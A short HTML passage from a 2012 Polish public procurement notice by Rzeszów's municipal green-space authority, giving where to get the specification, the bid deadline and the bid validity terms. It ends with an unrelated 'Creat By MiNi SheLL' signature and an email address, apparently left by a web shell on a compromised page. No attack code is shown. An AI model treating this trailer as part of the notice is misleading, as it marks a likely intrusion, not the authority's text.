<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> bip.erzeszow.pl/zamowienia-publiczne/zamowienia-publiczne-jednostek-organizacyjnych-miasta/zzm<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Zieleni Miejskiej w Rzeszowie, ul. Targowa 3, pokój nr 33 f, I piętro..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.10.2012 godzina 09:45, miejsce: Zarząd Zieleni Miejskiej w Rzeszowie, ul. Targowa 3, pokój nr 33, I piętro..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com